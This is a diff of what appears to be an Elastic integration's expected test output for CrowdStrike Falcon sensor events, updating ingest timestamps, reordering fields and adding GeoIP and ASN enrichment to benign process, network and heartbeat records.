@@ -333,7 +357,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150595900Z", + "ingested": "2021-12-14T14:41:26.533749560Z", "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"1620585913\",\"Timeout\":\"600\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018\",\"ProcessCount\":\"4\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"502\",\"event_platform\":\"Mac\",\"CommandLine\":\"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\\n feature_name: FEATURE_NAME,\\n variants: [FEATURE_VARIANT],\\n )\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsMacV1\",\"id\":\"ffffffff-1111-11eb-822b-06081a3f0f45\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff59fe460783ea45d59e417d6f\",\"timestamp\":\"1625677504527\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.527Z", "kind": "state", @@ -362,17 +386,23 @@ }, { "observer": { - "serial_number": "ffffffffe1ad47b6b5b44ae9151a6cf3", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe1ad47b6b5b44ae9151a6cf3", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:14.783Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -387,8 +417,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150602200Z", + "ingested": "2021-12-14T14:41:26.533749981Z", "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"3090255842\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"SensorHeartbeatMacV4\",\"ConfigIDPlatform\":\"4\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"ConfigIDBuild\":\"13701\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffe1ad47b6b5b44ae9151a6cf3\",\"ProvisionState\":\"1\",\"timestamp\":\"1625677514783\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.783Z", "kind": "event", @@ -455,12 +488,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8be84591864008eb2e484920", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff8be84591864008eb2e484920", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:02.500Z", "ecs": { 
@@ -480,7 +522,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150608400Z", + "ingested": "2021-12-14T14:41:26.533750389Z", "original": "{\"MachOSubType\":\"1\",\"ParentProcessId\":\"362213307092004097\",\"SourceProcessId\":\"362213307092004097\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"362213307092004097\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Mac\",\"ProcessEndTime\":\"\",\"SVUID\":\"0\",\"ParentBaseFileName\":\"launchd\",\"id\":\"ffffffff-1111-11eb-a9ce-02e9216bdbcb\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677502500\",\"ProcessGroupId\":\"362213307092004097\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"56254\",\"GID\":\"0\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"0\",\"MD5HashData\":\"88922d50263b059696c2af5a99906562\",\"SHA256HashData\":\"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"CommandLine\":\"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000\",\"TargetProcessId\":\"363276350115996101\",\"ImageFileName\":\"/usr/libexec/xpcproxy\",\"RGID\":\"0\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2MacV5\",\"RUID\":\"0\",\"ProcessStartTime\":\"1625677502.233\",\"aid\":\"ffffffff8be84591864008eb2e484920\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.500Z", "kind": "event", @@ -524,8 +566,20 @@ "type": "linux" }, "destination": { - "port": 53, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 53, "ip": "67.43.156.14" }, "source": { 
@@ -546,12 +600,21 @@ "direction": "inbound" }, "observer": { - "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:04.982Z", "ecs": { @@ -571,7 +634,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150614800Z", + "ingested": "2021-12-14T14:41:26.533750773Z", "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkReceiveAcceptIP4\",\"ContextTimeStamp\":\"1625677504.982\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307488247882\",\"RemotePort\":\"53\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"39920\",\"Entitlements\":\"15\",\"name\":\"NetworkReceiveAcceptIP4LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"1\",\"InContext\":\"0\",\"timestamp\":\"1625677505511\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:05.511Z", "kind": "event", @@ -610,8 +673,20 @@ "ip": "0.0.0.0" }, "source": { - "port": 53, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 53, "ip": "67.43.156.14" }, "url": { 
@@ -626,12 +701,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff01fc49949cf06bf0bce3c010", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff01fc49949cf06bf0bce3c010", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:21.866Z", "ecs": { @@ -651,7 +735,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150621Z", + "ingested": "2021-12-14T14:41:26.533751475Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"RawBindIP4\",\"ContextTimeStamp\":\"1625677521.866\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"362579458925546303\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"53\",\"Entitlements\":\"15\",\"name\":\"RawBindIP4MacV10\",\"id\":\"ffffffff-1111-11eb-81d4-0282ad9ac82d\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01fc49949cf06bf0bce3c010\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677522009\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:22.009Z", "kind": "event", 
@@ -705,12 +789,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffff083845f68a7de3d95cb34361", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff083845f68a7de3d95cb34361", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:23.901Z", "ecs": { @@ -732,7 +825,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150627200Z", + "ingested": "2021-12-14T14:41:26.533751939Z", "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677523.901\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP4\":\"127.0.0.1\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364783686797112486\",\"RemotePort\":\"50626\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6MacV10\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677524048\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.048Z", "kind": "event", 
@@ -794,12 +887,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffcf45409f87ed463b40c368ec", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0010912.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffcf45409f87ed463b40c368ec", + "type": "agent", + "version": "1007.8.0010912.1" }, "@timestamp": "2021-07-07T17:05:35.482Z", "ecs": { 
@@ -819,7 +921,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150633400Z", + "ingested": "2021-12-14T14:41:26.533752376Z", "original": "{\"ParentProcessId\":\"38911774195823\",\"SourceProcessId\":\"38911774195823\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"38911772846634\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Lin\",\"ProcessEndTime\":\"1625677535.102\",\"SVUID\":\"114\",\"ParentBaseFileName\":\"bash\",\"id\":\"ffffffff-1111-11eb-bad4-02690d039c6b\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677535482\",\"ProcessGroupId\":\"9277112078\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"73249\",\"GID\":\"119\",\"ConfigStateHash\":\"1284133626\",\"SVGID\":\"119\",\"MD5HashData\":\"29037cef466fa57f03bd1b2a092c47a4\",\"SHA256HashData\":\"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112\",\"ConfigBuild\":\"1007.8.0010912.1\",\"UID\":\"114\",\"CommandLine\":\"pgbackrest --stanza\\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG\",\"TargetProcessId\":\"38911778380590\",\"ImageFileName\":\"/usr/bin/pgbackrest\",\"RGID\":\"119\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2LinV6\",\"RUID\":\"114\",\"ProcessStartTime\":\"1625677535.068\",\"aid\":\"ffffffffcf45409f87ed463b40c368ec\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:35.482Z", "kind": "event", 
@@ -883,12 +985,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:03.713Z", "ecs": { @@ -908,7 +1019,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150639700Z", + "ingested": "2021-12-14T14:41:26.533752766Z", "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677503.713\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307455014463\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"41952\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677503947\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:03.947Z", "kind": "event", 
@@ -950,12 +1061,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff20bd481a98a3d1f6191047ff", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff20bd481a98a3d1f6191047ff", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:20.973Z", "file": { @@ -980,7 +1100,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150646300Z", + "ingested": "2021-12-14T14:41:26.533753319Z", "original": "{\"event_simpleName\":\"OoxmlFileWritten\",\"ContextTimeStamp\":\"1625677520.973\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365044948432500700\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"0500000100000000000000000000000021b0260000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OoxmlFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8ad1-02cfdadef55f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff20bd481a98a3d1f6191047ff\",\"timestamp\":\"1625677521081\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508\"}", "created": "2021-07-07T17:05:21.081Z", "kind": "event", 
@@ -1010,13 +1130,37 @@ "type": "linux" }, "destination": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 80, "ip": "67.43.156.14" }, "source": { - "port": 59926, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 59926, "ip": "67.43.156.14" }, "url": { @@ -1032,12 +1176,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffffbd064538b214ab0dce8e82c3", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffbd064538b214ab0dce8e82c3", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:30.308Z", "ecs": { 
@@ -1057,7 +1210,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150652600Z", + "ingested": "2021-12-14T14:41:26.533753739Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677530.308\",\"ConfigStateHash\":\"3469235958\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12227094573885\",\"RemotePort\":\"80\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59926\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4LinV5\",\"id\":\"ffffffff-1111-11eb-b727-028bbe41f38d\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffbd064538b214ab0dce8e82c3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677530841\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.841Z", "kind": "event", @@ -1084,17 +1237,23 @@ }, { "observer": { - "serial_number": "ffffffff25b14d4aa96de99e24bad2fa", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff25b14d4aa96de99e24bad2fa", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:04:53.974Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, 
@@ -1109,9 +1268,12 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-12-09T13:36:11.150658800Z", + "ingested": "2021-12-14T14:41:26.533754197Z", "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1156120155\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"12\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV2\",\"id\":\"ffffffff-1111-11eb-b7e0-02332cdcc16d\",\"ErrorCode\":\"0\",\"aid\":\"ffffffff25b14d4aa96de99e24bad2fa\",\"timestamp\":\"1625677493974\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b7e0-02332cdcc16d", "created": "2021-07-07T17:04:53.974Z" @@ -1134,44 +1296,27 @@ ] }, { - "os": { - "type": "linux" - }, - "source": { + "observer": { "geo": { - "continent_name": "Europe", - "country_name": "Denmark", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 10.0, - "lat": 56.0 + "lon": 90.5, + "lat": 27.5 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "BT" }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "mac": "6e-9e-e0-1f-6d-7d", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffc9114c1898e79604708955a6", "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffc9114c1898e79604708955a6", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:21.218Z", + "os": { + "type": "linux" + }, "ecs": { "version": "1.12.0" }, 
@@ -1188,8 +1333,22 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "mac": "6e-9e-e0-1f-6d-7d", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150665100Z", + "ingested": "2021-12-14T14:41:26.533754600Z", "original": "{\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677520.686\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"6e-9e-e0-1f-6d-7d\",\"InterfaceAlias\":\"vethdeb0243\",\"InterfaceIndex\":\"3736\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP6LinV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffffc9114c1898e79604708955a6\",\"timestamp\":\"1625677521218\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.218Z", "kind": "state", @@ -1212,21 +1371,33 @@ "PhysicalAddressLength": 6, "InterfaceAlias": "vethdeb0243", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff2d7b4778a73b2cf58d327e42", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff2d7b4778a73b2cf58d327e42", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:40.455Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -1241,9 +1412,12 @@ "67.43.156.13" ] }, + "os": { + "type": "macos" + }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-12-09T13:36:11.150671500Z", + "ingested": "2021-12-14T14:41:26.533754995Z", "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1620585913\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.13\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"210\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ChannelVersionRequiredMacV2\",\"id\":\"ffffffff-1111-11eb-8cc5-02c6fb049dd3\",\"ErrorCode\":\"0\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff2d7b4778a73b2cf58d327e42\",\"timestamp\":\"1625677480455\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-8cc5-02c6fb049dd3", "created": "2021-07-07T17:04:40.455Z" @@ -1269,17 +1443,23 @@ }, { "observer": { - "serial_number": "fffffffff6e146908cbf31d72b94b626", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffff6e146908cbf31d72b94b626", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:40.292Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, 
@@ -1294,8 +1474,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150677900Z", + "ingested": "2021-12-14T14:41:26.533755497Z", "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"1156120155\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ConfigurationVersion\":\"10\",\"name\":\"SensorHeartbeatLinV4\",\"ConfigIDPlatform\":\"8\",\"id\":\"ffffffff-1111-11eb-993f-02b8dc387eb5\",\"ConfigIDBuild\":\"11611\",\"aid\":\"fffffffff6e146908cbf31d72b94b626\",\"timestamp\":\"1625677540292\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:40.292Z", "kind": "event", @@ -1344,12 +1527,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff083845f68a7de3d95cb34361", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff083845f68a7de3d95cb34361", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:28.570Z", "file": { 
@@ -1375,7 +1567,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150684100Z", + "ingested": "2021-12-14T14:41:26.533755970Z", "original": "{\"event_simpleName\":\"JavaClassFileWritten\",\"ContextTimeStamp\":\"1625677528.570\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364783686797112486\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000986b480e00000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"JavaClassFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"timestamp\":\"1625677528717\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class\"}", "created": "2021-07-07T17:05:28.717Z", "kind": "event", @@ -1405,8 +1597,20 @@ "type": "macos" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 443, "ip": "67.43.156.14" }, "source": { @@ -1426,12 +1630,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffff96f142f6b2475f3c584ddd80", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff96f142f6b2475f3c584ddd80", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:12.700Z", "ecs": { 
